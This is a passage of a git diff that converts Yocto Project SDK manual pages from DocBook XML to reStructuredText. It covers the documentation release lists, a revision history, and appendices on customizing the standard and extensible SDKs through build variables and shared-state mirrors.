+**************************
+
+- :yocto_docs:`1.7 Documentation </1.7>`
+- :yocto_docs:`1.7.1 Documentation </1.7.1>`
+- :yocto_docs:`1.7.2 Documentation </1.7.2>`
+- :yocto_docs:`1.7.3 Documentation </1.7.3>`
+
+**************************
+Release Series 1.6 (daisy)
+**************************
+
+- :yocto_docs:`1.6 Documentation </1.6>`
+- :yocto_docs:`1.6.1 Documentation </1.6.1>`
+- :yocto_docs:`1.6.2 Documentation </1.6.2>`
+- :yocto_docs:`1.6.3 Documentation </1.6.3>`
+
+*************************
+Release Series 1.5 (dora)
+*************************
+
+- :yocto_docs:`1.5 Documentation </1.5>`
+- :yocto_docs:`1.5.1 Documentation </1.5.1>`
+- :yocto_docs:`1.5.2 Documentation </1.5.2>`
+- :yocto_docs:`1.5.3 Documentation </1.5.3>`
+- :yocto_docs:`1.5.4 Documentation </1.5.4>`
+
+**************************
+Release Series 1.4 (dylan)
+**************************
+
+- :yocto_docs:`1.4 Documentation </1.4>`
+- :yocto_docs:`1.4.1 Documentation </1.4.1>`
+- :yocto_docs:`1.4.2 Documentation </1.4.2>`
+- :yocto_docs:`1.4.3 Documentation </1.4.3>`
+- :yocto_docs:`1.4.4 Documentation </1.4.4>`
+- :yocto_docs:`1.4.5 Documentation </1.4.5>`
+
+**************************
+Release Series 1.3 (danny)
+**************************
+
+- :yocto_docs:`1.3 Documentation </1.3>`
+- :yocto_docs:`1.3.1 Documentation </1.3.1>`
+- :yocto_docs:`1.3.2 Documentation </1.3.2>`
+
+***************************
+Release Series 1.2 (denzil)
+***************************
+
+- :yocto_docs:`1.2 Documentation </1.2>`
+- :yocto_docs:`1.2.1 Documentation </1.2.1>`
+- :yocto_docs:`1.2.2 Documentation </1.2.2>`
+
+***************************
+Release Series 1.1 (edison)
+***************************
+
+- :yocto_docs:`1.1 Documentation </1.1>`
+- :yocto_docs:`1.1.1 Documentation </1.1.1>`
+- :yocto_docs:`1.1.2 Documentation </1.1.2>`
+
+****************************
+Release Series 1.0 (bernard)
+****************************
+
+- :yocto_docs:`1.0 Documentation </1.0>`
+- :yocto_docs:`1.0.1 Documentation </1.0.1>`
+- :yocto_docs:`1.0.2 Documentation </1.0.2>`
+
+****************************
+Release Series 0.9 (laverne)
+****************************
+
+- :yocto_docs:`0.9 Documentation </0.9>`
diff --git a/documentation/sdk-manual/history.rst b/documentation/sdk-manual/history.rst
new file mode 100644
index 0000000000..5562eb7894
--- /dev/null
+++ b/documentation/sdk-manual/history.rst
@@ -0,0 +1,52 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+***********************
+Manual Revision History
+***********************
+
+.. list-table::
+   :widths: 10 15 40
+   :header-rows: 1
+
+   * - Revision
+     - Date
+     - Note
+   * - 2.1
+     - April 2016
+     - The initial document released with the Yocto Project 2.1 Release
+   * - 2.2
+     - October 2016
+     - Released with the Yocto Project 2.2 Release.
+   * - 2.3
+     - May 2017
+     - Released with the Yocto Project 2.3 Release.
+   * - 2.4
+     - October 2017
+     - Released with the Yocto Project 2.4 Release.
+   * - 2.5
+     - May 2018
+     - Released with the Yocto Project 2.5 Release.
+   * - 2.6
+     - November 2018
+     - Released with the Yocto Project 2.6 Release.
+   * - 2.7
+     - May 2019
+     - Released with the Yocto Project 2.7 Release.
+   * - 3.0
+     - October 2019
+     - Released with the Yocto Project 3.0 Release.
+   * - 3.1
+     - April 2020
+     - Released with the Yocto Project 3.1 Release.
+   * - 3.1.1
+     - June 2020
+     - Released with the Yocto Project 3.1.1 Release.
+   * - 3.1.2
+     - August 2020
+     - Released with the Yocto Project 3.1.2 Release.
+   * - 3.1.3
+     - September 2020
+     - Released with the Yocto Project 3.1.3 Release.
+   * - 3.1.4
+     - November 2020
+     - Released with the Yocto Project 3.1.4 Release.
diff --git a/documentation/sdk-manual/sdk-appendix-customizing-standard.rst b/documentation/sdk-manual/sdk-appendix-customizing-standard.rst
new file mode 100644
index 0000000000..90b634529e
--- /dev/null
+++ b/documentation/sdk-manual/sdk-appendix-customizing-standard.rst
@@ -0,0 +1,34 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+****************************
+Customizing the Standard SDK
+****************************
+
+This appendix presents customizations you can apply to the standard SDK.
+
+Adding Individual Packages to the Standard SDK
+==============================================
+
+When you build a standard SDK using the ``bitbake -c populate_sdk``, a
+default set of packages is included in the resulting SDK. The
+:term:`TOOLCHAIN_HOST_TASK`
+and
+:term:`TOOLCHAIN_TARGET_TASK`
+variables control the set of packages adding to the SDK.
+
+If you want to add individual packages to the toolchain that runs on the
+host, simply add those packages to the ``TOOLCHAIN_HOST_TASK`` variable.
+Similarly, if you want to add packages to the default set that is part
+of the toolchain that runs on the target, add the packages to the
+``TOOLCHAIN_TARGET_TASK`` variable.
+
+Adding API Documentation to the Standard SDK
+============================================
+
+You can include API documentation as well as any other documentation
+provided by recipes with the standard SDK by adding "api-documentation"
+to the
+:term:`DISTRO_FEATURES`
+variable: DISTRO_FEATURES_append = " api-documentation" Setting this
+variable as shown here causes the OpenEmbedded build system to build the
+documentation and then include it in the standard SDK.
diff --git a/documentation/sdk-manual/sdk-appendix-customizing-standard.xml b/documentation/sdk-manual/sdk-appendix-customizing-standard.xml
deleted file mode 100644
index f20891c80d..0000000000
--- a/documentation/sdk-manual/sdk-appendix-customizing-standard.xml
+++ /dev/null
@@ -1,58 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<appendix id='sdk-appendix-customizing-standard'>
-
-<title>Customizing the Standard SDK</title>
-
-<para>
-    This appendix presents customizations you can apply to the standard SDK.
-</para>
-
-<section id='sdk-adding-individual-packages'>
-    <title>Adding Individual Packages to the Standard SDK</title>
-
-    <para>
-         When you build a standard SDK using the
-         <filename>bitbake -c populate_sdk</filename>, a default set of
-         packages is included in the resulting SDK.
-         The
-         <ulink url='&YOCTO_DOCS_REF_URL;#var-TOOLCHAIN_HOST_TASK'><filename>TOOLCHAIN_HOST_TASK</filename></ulink>
-         and
-         <ulink url='&YOCTO_DOCS_REF_URL;#var-TOOLCHAIN_TARGET_TASK'><filename>TOOLCHAIN_TARGET_TASK</filename></ulink>
-         variables control the set of packages adding to the SDK.
-    </para>
-
-    <para>
-        If you want to add individual packages to the toolchain that runs on
-        the host, simply add those packages to the
-        <filename>TOOLCHAIN_HOST_TASK</filename> variable.
-        Similarly, if you want to add packages to the default set that is
-        part of the toolchain that runs on the target, add the packages to the
-        <filename>TOOLCHAIN_TARGET_TASK</filename> variable.
-    </para>
-</section>
-
-<section id='adding-api-documentation-to-the-standard-sdk'>
-    <title>Adding API Documentation to the Standard SDK</title>
-
-    <para>
-        You can include API documentation as well as any other
-        documentation provided by recipes with the standard SDK by
-        adding "api-documentation" to the
-        <ulink url='&YOCTO_DOCS_REF_URL;#var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></ulink>
-        variable:
-        <literallayout class='monospaced'>
-     DISTRO_FEATURES_append = " api-documentation"
-        </literallayout>
-        Setting this variable as shown here causes the OpenEmbedded build
-        system to build the documentation and then include it in the standard
-        SDK.
-    </para>
-</section>
-
-</appendix>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/sdk-manual/sdk-appendix-customizing.rst b/documentation/sdk-manual/sdk-appendix-customizing.rst
new file mode 100644
index 0000000000..5a33f6385e
--- /dev/null
+++ b/documentation/sdk-manual/sdk-appendix-customizing.rst
@@ -0,0 +1,377 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+******************************
+Customizing the Extensible SDK
+******************************
+
+This appendix describes customizations you can apply to the extensible
+SDK.
+
+Configuring the Extensible SDK
+==============================
+
+The extensible SDK primarily consists of a pre-configured copy of the
+OpenEmbedded build system from which it was produced. Thus, the SDK's
+configuration is derived using that build system and the filters shown
+in the following list. When these filters are present, the OpenEmbedded
+build system applies them against ``local.conf`` and ``auto.conf``:
+
+-  Variables whose values start with "/" are excluded since the
+   assumption is that those values are paths that are likely to be
+   specific to the :term:`Build Host`.
+
+-  Variables listed in
+   :term:`SDK_LOCAL_CONF_BLACKLIST`
+   are excluded. These variables are not allowed through from the
+   OpenEmbedded build system configuration into the extensible SDK
+   configuration. Typically, these variables are specific to the machine
+   on which the build system is running and could be problematic as part
+   of the extensible SDK configuration.
+
+   For a list of the variables excluded by default, see the
+   :term:`SDK_LOCAL_CONF_BLACKLIST`
+   in the glossary of the Yocto Project Reference Manual.
+
+-  Variables listed in
+   :term:`SDK_LOCAL_CONF_WHITELIST`
+   are included. Including a variable in the value of
+   ``SDK_LOCAL_CONF_WHITELIST`` overrides either of the previous two
+   filters. The default value is blank.
+
+-  Classes inherited globally with
+   :term:`INHERIT` that are listed in
+   :term:`SDK_INHERIT_BLACKLIST`
+   are disabled. Using ``SDK_INHERIT_BLACKLIST`` to disable these
+   classes is the typical method to disable classes that are problematic
+   or unnecessary in the SDK context. The default value blacklists the
+   :ref:`buildhistory <ref-classes-buildhistory>`
+   and :ref:`icecc <ref-classes-icecc>` classes.
+
+Additionally, the contents of ``conf/sdk-extra.conf``, when present, are
+appended to the end of ``conf/local.conf`` within the produced SDK,
+without any filtering. The ``sdk-extra.conf`` file is particularly
+useful if you want to set a variable value just for the SDK and not the
+OpenEmbedded build system used to create the SDK.
+
+Adjusting the Extensible SDK to Suit Your Build Host's Setup
+============================================================
+
+In most cases, the extensible SDK defaults should work with your :term:`Build
+Host`'s setup.
+However, some cases exist for which you might consider making
+adjustments:
+
+-  If your SDK configuration inherits additional classes using the
+   :term:`INHERIT` variable and you
+   do not need or want those classes enabled in the SDK, you can
+   blacklist them by adding them to the
+   :term:`SDK_INHERIT_BLACKLIST`
+   variable as described in the fourth bullet of the previous section.
+
+   .. note::
+
+      The default value of
+      SDK_INHERIT_BLACKLIST
+      is set using the "?=" operator. Consequently, you will need to
+      either define the entire list by using the "=" operator, or you
+      will need to append a value using either "_append" or the "+="
+      operator. You can learn more about these operators in the "
+      Basic Syntax
+      " section of the BitBake User Manual.
+
+   .
+
+-  If you have classes or recipes that add additional tasks to the
+   standard build flow (i.e. the tasks execute as the recipe builds as
+   opposed to being called explicitly), then you need to do one of the
+   following:
+
+   -  After ensuring the tasks are :ref:`shared
+      state <overview-manual/overview-manual-concepts:shared state cache>` tasks (i.e. the
+      output of the task is saved to and can be restored from the shared
+      state cache) or ensuring the tasks are able to be produced quickly
+      from a task that is a shared state task, add the task name to the
+      value of
+      :term:`SDK_RECRDEP_TASKS`.
+
+   -  Disable the tasks if they are added by a class and you do not need
+      the functionality the class provides in the extensible SDK. To
+      disable the tasks, add the class to the ``SDK_INHERIT_BLACKLIST``
+      variable as described in the previous section.
+
+-  Generally, you want to have a shared state mirror set up so users of
+   the SDK can add additional items to the SDK after installation
+   without needing to build the items from source. See the "`Providing
+   Additional Installable Extensible SDK
+   Content <#sdk-providing-additional-installable-extensible-sdk-content>`__"
+   section for information.
+
+-  If you want users of the SDK to be able to easily update the SDK, you
+   need to set the
+   :term:`SDK_UPDATE_URL`
+   variable. For more information, see the "`Providing Updates to the
+   Extensible SDK After
+   Installation <#sdk-providing-updates-to-the-extensible-sdk-after-installation>`__"
+   section.
+
+-  If you have adjusted the list of files and directories that appear in
+   :term:`COREBASE` (other than
+   layers that are enabled through ``bblayers.conf``), then you must
+   list these files in
+   :term:`COREBASE_FILES` so
+   that the files are copied into the SDK.
+
+-  If your OpenEmbedded build system setup uses a different environment
+   setup script other than
+   :ref:`structure-core-script`, then you must
+   set
+   :term:`OE_INIT_ENV_SCRIPT`
+   to point to the environment setup script you use.
+
+   .. note::
+
+      You must also reflect this change in the value used for the
+      COREBASE_FILES
+      variable as previously described.
+
+Changing the Extensible SDK Installer Title
+===========================================
+
+You can change the displayed title for the SDK installer by setting the
+:term:`SDK_TITLE` variable and then
+rebuilding the the SDK installer. For information on how to build an SDK
+installer, see the "`Building an SDK
+Installer <#sdk-building-an-sdk-installer>`__" section.
+
+By default, this title is derived from
+:term:`DISTRO_NAME` when it is
+set. If the ``DISTRO_NAME`` variable is not set, the title is derived
+from the :term:`DISTRO` variable.
+
+The
+:ref:`populate_sdk_base <ref-classes-populate-sdk-*>`
+class defines the default value of the ``SDK_TITLE`` variable as
+follows:
+::
+
+   SDK_TITLE ??= "${@d.getVar('DISTRO_NAME') or d.getVar('DISTRO')} SDK"
+
+While several ways exist to change this variable, an efficient method is
+to set the variable in your distribution's configuration file. Doing so
+creates an SDK installer title that applies across your distribution. As
+an example, assume you have your own layer for your distribution named
+"meta-mydistro" and you are using the same type of file hierarchy as
+does the default "poky" distribution. If so, you could update the
+``SDK_TITLE`` variable in the
+``~/meta-mydistro/conf/distro/mydistro.conf`` file using the following
+form:
+::
+
+   SDK_TITLE = "your_title"
+
+Providing Updates to the Extensible SDK After Installation
+==========================================================
+
+When you make changes to your configuration or to the metadata and if
+you want those changes to be reflected in installed SDKs, you need to
+perform additional steps. These steps make it possible for anyone using
+the installed SDKs to update the installed SDKs by using the
+``devtool sdk-update`` command:
+
+1. Create a directory that can be shared over HTTP or HTTPS. You can do
+   this by setting up a web server such as an `Apache HTTP
+   Server <https://en.wikipedia.org/wiki/Apache_HTTP_Server>`__ or
+   `Nginx <https://en.wikipedia.org/wiki/Nginx>`__ server in the cloud
+   to host the directory. This directory must contain the published SDK.
+
+2. Set the
+   :term:`SDK_UPDATE_URL`
+   variable to point to the corresponding HTTP or HTTPS URL. Setting
+   this variable causes any SDK built to default to that URL and thus,
+   the user does not have to pass the URL to the ``devtool sdk-update``
+   command as described in the "`Applying Updates to an Installed
+   Extensible
+   SDK <#sdk-applying-updates-to-an-installed-extensible-sdk>`__"
+   section.
+
+3. Build the extensible SDK normally (i.e., use the
+   ``bitbake -c populate_sdk_ext`` imagename command).
+
+4. Publish the SDK using the following command:
+   ::
+
+      $ oe-publish-sdk some_path/sdk-installer.sh path_to_shared_http_directory
+
+   You must
+   repeat this step each time you rebuild the SDK with changes that you
+   want to make available through the update mechanism.
+
+Completing the above steps allows users of the existing installed SDKs
+to simply run ``devtool sdk-update`` to retrieve and apply the latest
+updates. See the "`Applying Updates to an Installed Extensible
+SDK <#sdk-applying-updates-to-an-installed-extensible-sdk>`__" section
+for further information.
+
+Changing the Default SDK Installation Directory
+===============================================
+
+When you build the installer for the Extensible SDK, the default
+installation directory for the SDK is based on the
+:term:`DISTRO` and
+:term:`SDKEXTPATH` variables from
+within the
+:ref:`populate_sdk_base <ref-classes-populate-sdk-*>`
+class as follows:
+::
+
+   SDKEXTPATH ??= "~/${@d.getVar('DISTRO')}_sdk"
+
+You can
+change this default installation directory by specifically setting the
+``SDKEXTPATH`` variable.
+
+While a number of ways exist through which you can set this variable,
+the method that makes the most sense is to set the variable in your
+distribution's configuration file. Doing so creates an SDK installer
+default directory that applies across your distribution. As an example,
+assume you have your own layer for your distribution named
+"meta-mydistro" and you are using the same type of file hierarchy as
+does the default "poky" distribution. If so, you could update the
+``SDKEXTPATH`` variable in the
+``~/meta-mydistro/conf/distro/mydistro.conf`` file using the following
+form:
+::
+
+   SDKEXTPATH = "some_path_for_your_installed_sdk"
+
+After building your installer, running it prompts the user for
+acceptance of the some_path_for_your_installed_sdk directory as the
+default location to install the Extensible SDK.
+
+Providing Additional Installable Extensible SDK Content
+=======================================================
+
+If you want the users of an extensible SDK you build to be able to add
+items to the SDK without requiring the users to build the items from
+source, you need to do a number of things:
+
+1. Ensure the additional items you want the user to be able to install
+   are already built:
+
+   -  Build the items explicitly. You could use one or more "meta"
+      recipes that depend on lists of other recipes.
+
+   -  Build the "world" target and set
+      ``EXCLUDE_FROM_WORLD_pn-``\ recipename for the recipes you do not
+      want built. See the
+      :term:`EXCLUDE_FROM_WORLD`
+      variable for additional information.
+
+2. Expose the ``sstate-cache`` directory produced by the build.
+   Typically, you expose this directory by making it available through
+   an `Apache HTTP
+   Server <https://en.wikipedia.org/wiki/Apache_HTTP_Server>`__ or
+   `Nginx <https://en.wikipedia.org/wiki/Nginx>`__ server.
+
+3. Set the appropriate configuration so that the produced SDK knows how
+   to find the configuration. The variable you need to set is
+   :term:`SSTATE_MIRRORS`:
+   ::
+
+      SSTATE_MIRRORS = "file://.* http://example.com/some_path/sstate-cache/PATH"
+
+   You can set the
+   ``SSTATE_MIRRORS`` variable in two different places:
+
+   -  If the mirror value you are setting is appropriate to be set for
+      both the OpenEmbedded build system that is actually building the
+      SDK and the SDK itself (i.e. the mirror is accessible in both
+      places or it will fail quickly on the OpenEmbedded build system
+      side, and its contents will not interfere with the build), then
+      you can set the variable in your ``local.conf`` or custom distro
+      configuration file. You can then "whitelist" the variable through
+      to the SDK by adding the following:
+      ::
+
+         SDK_LOCAL_CONF_WHITELIST = "SSTATE_MIRRORS"
+
+   -  Alternatively, if you just want to set the ``SSTATE_MIRRORS``
+      variable's value for the SDK alone, create a
+      ``conf/sdk-extra.conf`` file either in your
+      :term:`Build Directory` or within any
+      layer and put your ``SSTATE_MIRRORS`` setting within that file.
+
+      .. note::
+
+         This second option is the safest option should you have any
+         doubts as to which method to use when setting
+         SSTATE_MIRRORS
+         .
+
+Minimizing the Size of the Extensible SDK Installer Download
+============================================================
+
+By default, the extensible SDK bundles the shared state artifacts for
+everything needed to reconstruct the image for which the SDK was built.
+This bundling can lead to an SDK installer file that is a Gigabyte or
+more in size. If the size of this file causes a problem, you can build
+an SDK that has just enough in it to install and provide access to the
+``devtool command`` by setting the following in your configuration:
+::
+
+   SDK_EXT_TYPE = "minimal"
+
+Setting
+:term:`SDK_EXT_TYPE` to
+"minimal" produces an SDK installer that is around 35 Mbytes in size,
+which downloads and installs quickly. You need to realize, though, that
+the minimal installer does not install any libraries or tools out of the
+box. These libraries and tools must be installed either "on the fly" or
+through actions you perform using ``devtool`` or explicitly with the
+``devtool sdk-install`` command.
+
+In most cases, when building a minimal SDK you need to also enable
+bringing in the information on a wider range of packages produced by the
+system. Requiring this wider range of information is particularly true
+so that ``devtool add`` is able to effectively map dependencies it
+discovers in a source tree to the appropriate recipes. Additionally, the
+information enables the ``devtool search`` command to return useful
+results.
+
+To facilitate this wider range of information, you would need to set the
+following:
+::
+
+   SDK_INCLUDE_PKGDATA = "1"
+
+See the :term:`SDK_INCLUDE_PKGDATA` variable for additional information.
+
+Setting the ``SDK_INCLUDE_PKGDATA`` variable as shown causes the "world"
+target to be built so that information for all of the recipes included
+within it are available. Having these recipes available increases build
+time significantly and increases the size of the SDK installer by 30-80
+Mbytes depending on how many recipes are included in your configuration.
+
+You can use ``EXCLUDE_FROM_WORLD_pn-``\ recipename for recipes you want
+to exclude. However, it is assumed that you would need to be building
+the "world" target if you want to provide additional items to the SDK.
+Consequently, building for "world" should not represent undue overhead
+in most cases.
+
+.. note::
+
+   If you set
+   SDK_EXT_TYPE
+   to "minimal", then providing a shared state mirror is mandatory so
+   that items can be installed as needed. See the "
+   Providing Additional Installable Extensible SDK Content
+   " section for more information.
+
+You can explicitly control whether or not to include the toolchain when
+you build an SDK by setting the
+:term:`SDK_INCLUDE_TOOLCHAIN`
+variable to "1". In particular, it is useful to include the toolchain
+when you have set ``SDK_EXT_TYPE`` to "minimal", which by default,
+excludes the toolchain. Also, it is helpful if you are building a small
+SDK for use with an IDE or some other tool where you do not want to take
+extra steps to install a toolchain.
diff --git a/documentation/sdk-manual/sdk-appendix-customizing.xml b/documentation/sdk-manual/sdk-appendix-customizing.xml
deleted file mode 100644
index 911658f914..0000000000
--- a/documentation/sdk-manual/sdk-appendix-customizing.xml
+++ /dev/null
@@ -1,514 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<appendix id='sdk-appendix-customizing'>
-
-<title>Customizing the Extensible SDK</title>
-
-<para>
-    This appendix describes customizations you can apply to the extensible SDK.
-</para>
-
-<section id='sdk-configuring-the-extensible-sdk'>
-    <title>Configuring the Extensible SDK</title>
-
-    <para>
-        The extensible SDK primarily consists of a pre-configured copy of
-        the OpenEmbedded build system from which it was produced.
-        Thus, the SDK's configuration is derived using that build system and
-        the filters shown in the following list.
-        When these filters are present, the OpenEmbedded build system applies
-        them against <filename>local.conf</filename> and
-        <filename>auto.conf</filename>:
-        <itemizedlist>
-            <listitem><para>
-                Variables whose values start with "/" are excluded since the
-                assumption is that those values are paths that are likely to
-                be specific to the
-                <ulink url='&YOCTO_DOCS_REF_URL;#hardware-build-system-term'>build host</ulink>.
-                </para></listitem>
-            <listitem><para>
-                Variables listed in
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_LOCAL_CONF_BLACKLIST'><filename>SDK_LOCAL_CONF_BLACKLIST</filename></ulink>
-                are excluded.
-                These variables are not allowed through from the OpenEmbedded
-                build system configuration into the extensible SDK
-                configuration.
-                Typically, these variables are specific to the machine on
-                which the build system is running and could be problematic
-                as part of the extensible SDK configuration.</para>
-
-                <para>For a list of the variables excluded by default, see the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_LOCAL_CONF_BLACKLIST'><filename>SDK_LOCAL_CONF_BLACKLIST</filename></ulink>
-                in the glossary of the Yocto Project Reference Manual.
-                </para></listitem>
-            <listitem><para>
-                Variables listed in
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_LOCAL_CONF_WHITELIST'><filename>SDK_LOCAL_CONF_WHITELIST</filename></ulink>
-                are included.
-                Including a variable in the value of
-                <filename>SDK_LOCAL_CONF_WHITELIST</filename> overrides either
-                of the previous two filters.
-                The default value is blank.
-                </para></listitem>
-            <listitem><para>
-                Classes inherited globally with
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-INHERIT'><filename>INHERIT</filename></ulink>
-                that are listed in
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_INHERIT_BLACKLIST'><filename>SDK_INHERIT_BLACKLIST</filename></ulink>
-                are disabled.
-                Using <filename>SDK_INHERIT_BLACKLIST</filename> to disable
-                these classes is the typical method to disable classes that
-                are problematic or unnecessary in the SDK context.
-                The default value blacklists the
-                <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-buildhistory'><filename>buildhistory</filename></ulink>
-                and
-                <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-icecc'><filename>icecc</filename></ulink>
-                classes.
-                </para></listitem>
-        </itemizedlist>
-        Additionally, the contents of <filename>conf/sdk-extra.conf</filename>,
-        when present, are appended to the end of
-        <filename>conf/local.conf</filename> within the produced SDK, without
-        any filtering.
-        The <filename>sdk-extra.conf</filename> file is particularly useful
-        if you want to set a variable value just for the SDK and not the
-        OpenEmbedded build system used to create the SDK.
-    </para>
-</section>
-
-<section id='adjusting-the-extensible-sdk-to-suit-your-build-hosts-setup'>
-    <title>Adjusting the Extensible SDK to Suit Your Build Host's Setup</title>
-
-    <para>
-        In most cases, the extensible SDK defaults should work with your
-        <ulink url='&YOCTO_DOCS_REF_URL;#hardware-build-system-term'>build host's</ulink>
-        setup.
-        However, some cases exist for which you might consider making
-        adjustments:
-        <itemizedlist>
-            <listitem><para>
-                If your SDK configuration inherits additional classes
-                using the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-INHERIT'><filename>INHERIT</filename></ulink>
-                variable and you do not need or want those classes enabled in
-                the SDK, you can blacklist them by adding them to the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_INHERIT_BLACKLIST'><filename>SDK_INHERIT_BLACKLIST</filename></ulink>
-                variable as described in the fourth bullet of the previous
-                section.
-                <note>
-                    The default value of
-                    <filename>SDK_INHERIT_BLACKLIST</filename> is set using
-                    the "?=" operator.
-                    Consequently, you will need to either define the entire
-                    list by using the "=" operator, or you will need to append
-                    a value using either "_append" or the "+=" operator.
-                    You can learn more about these operators in the
-                    "<ulink url='&YOCTO_DOCS_BB_URL;#basic-syntax'>Basic Syntax</ulink>"
-                    section of the BitBake User Manual.
-                </note>.
-                </para></listitem>
-            <listitem><para>
-                If you have classes or recipes that add additional tasks to
-                the standard build flow (i.e. the tasks execute as the recipe
-                builds as opposed to being called explicitly), then you need
-                to do one of the following:
-                <itemizedlist>
-                    <listitem><para>
-                        After ensuring the tasks are
-                        <ulink url='&YOCTO_DOCS_OM_URL;#shared-state-cache'>shared state</ulink>
-                        tasks (i.e. the output of the task is saved to and
-                        can be restored from the shared state cache) or
-                        ensuring the tasks are able to be produced quickly from
-                        a task that is a shared state task, add the task name
-                        to the value of
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_RECRDEP_TASKS'><filename>SDK_RECRDEP_TASKS</filename></ulink>.
-                        </para></listitem>
-                    <listitem><para>
-                        Disable the tasks if they are added by a class and
-                        you do not need the functionality the class provides
-                        in the extensible SDK.
-                        To disable the tasks, add the class to the
-                        <filename>SDK_INHERIT_BLACKLIST</filename> variable
-                        as described in the previous section.
-                        </para></listitem>
-                </itemizedlist>
-                </para></listitem>
-            <listitem><para>
-                Generally, you want to have a shared state mirror set up so
-                users of the SDK can add additional items to the SDK after
-                installation without needing to build the items from source.
-                See the
-                "<link linkend='sdk-providing-additional-installable-extensible-sdk-content'>Providing Additional Installable Extensible SDK Content</link>"
-                section for information.
-                </para></listitem>
-            <listitem><para>
-                If you want users of the SDK to be able to easily update the
-                SDK, you need to set the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_UPDATE_URL'><filename>SDK_UPDATE_URL</filename></ulink>
-                variable.
-                For more information, see the
-                "<link linkend='sdk-providing-updates-to-the-extensible-sdk-after-installation'>Providing Updates to the Extensible SDK After Installation</link>"
-                section.
-                </para></listitem>
-            <listitem><para>
-                If you have adjusted the list of files and directories that
-                appear in
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-COREBASE'><filename>COREBASE</filename></ulink>
-                (other than layers that are enabled through
-                <filename>bblayers.conf</filename>), then you must list these
-                files in
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-COREBASE_FILES'><filename>COREBASE_FILES</filename></ulink>
-                so that the files are copied into the SDK.
-                </para></listitem>
-            <listitem><para>
-                If your OpenEmbedded build system setup uses a different
-                environment setup script other than
-                <ulink url='&YOCTO_DOCS_REF_URL;#structure-core-script'><filename>&OE_INIT_FILE;</filename></ulink>,
-                then you must set
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-OE_INIT_ENV_SCRIPT'><filename>OE_INIT_ENV_SCRIPT</filename></ulink>
-                to point to the environment setup script you use.
-                <note>
-                    You must also reflect this change in the value used for the
-                    <filename>COREBASE_FILES</filename> variable as previously
-                    described.
-                </note>
-                </para></listitem>
-        </itemizedlist>
-    </para>
-</section>
-
-<section id='sdk-changing-the-sdk-installer-title'>
-    <title>Changing the Extensible SDK Installer Title</title>
-
-    <para>
-        You can change the displayed title for the SDK installer by setting
-        the
-        <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_TITLE'><filename>SDK_TITLE</filename></ulink>
-        variable and then rebuilding the the SDK installer.
-        For information on how to build an SDK installer, see the
-        "<link linkend='sdk-building-an-sdk-installer'>Building an SDK Installer</link>"
-        section.
-    </para>
-
-    <para>
-        By default, this title is derived from
-        <ulink url='&YOCTO_DOCS_REF_URL;#var-DISTRO_NAME'><filename>DISTRO_NAME</filename></ulink>
-        when it is set.
-        If the <filename>DISTRO_NAME</filename> variable is not set, the title
-        is derived from the
-        <ulink url='&YOCTO_DOCS_REF_URL;#var-DISTRO'><filename>DISTRO</filename></ulink>
-        variable.
-    </para>
-
-    <para>
-        The
-        <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-populate-sdk-*'><filename>populate_sdk_base</filename></ulink>
-        class defines the default value of the <filename>SDK_TITLE</filename>
-        variable as follows:
-        <literallayout class='monospaced'>
-     SDK_TITLE ??= "${@d.getVar('DISTRO_NAME') or d.getVar('DISTRO')} SDK"
-        </literallayout>
-    </para>
-
-    <para>
-        While several ways exist to change this variable, an efficient method
-        is to set the variable in your distribution's configuration file.
-        Doing so creates an SDK installer title that applies across your
-        distribution.
-        As an example, assume you have your own layer for your distribution
-        named "meta-mydistro" and you are using the same type of file
-        hierarchy as does the default "poky" distribution.
-        If so, you could update the <filename>SDK_TITLE</filename> variable
-        in the
-        <filename>~/meta-mydistro/conf/distro/mydistro.conf</filename> file
-        using the following form:
-        <literallayout class='monospaced'>
-     SDK_TITLE = "<replaceable>your_title</replaceable>"
-        </literallayout>
-    </para>
-</section>
-
-<section id='sdk-providing-updates-to-the-extensible-sdk-after-installation'>
-    <title>Providing Updates to the Extensible SDK After Installation</title>
-
-    <para>
-        When you make changes to your configuration or to the metadata and
-        if you want those changes to be reflected in installed SDKs, you need
-        to perform additional steps.
-        These steps make it possible for anyone using the installed SDKs to
-        update the installed SDKs by using the
-        <filename>devtool sdk-update</filename> command:
-        <orderedlist>
-            <listitem><para>
-                Create a directory that can be shared over HTTP or HTTPS.
-                You can do this by setting up a web server such as an
-                <ulink url='https://en.wikipedia.org/wiki/Apache_HTTP_Server'>Apache HTTP Server</ulink>
-                or
-                <ulink url='https://en.wikipedia.org/wiki/Nginx'>Nginx</ulink>
-                server in the cloud to host the directory.
-                This directory must contain the published SDK.
-                </para></listitem>
-            <listitem><para>
-                Set the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_UPDATE_URL'><filename>SDK_UPDATE_URL</filename></ulink>
-                variable to point to the corresponding HTTP or HTTPS URL.
-                Setting this variable causes any SDK built to default to that
-                URL and thus, the user does not have to pass the URL to the
-                <filename>devtool sdk-update</filename> command as described
-                in the
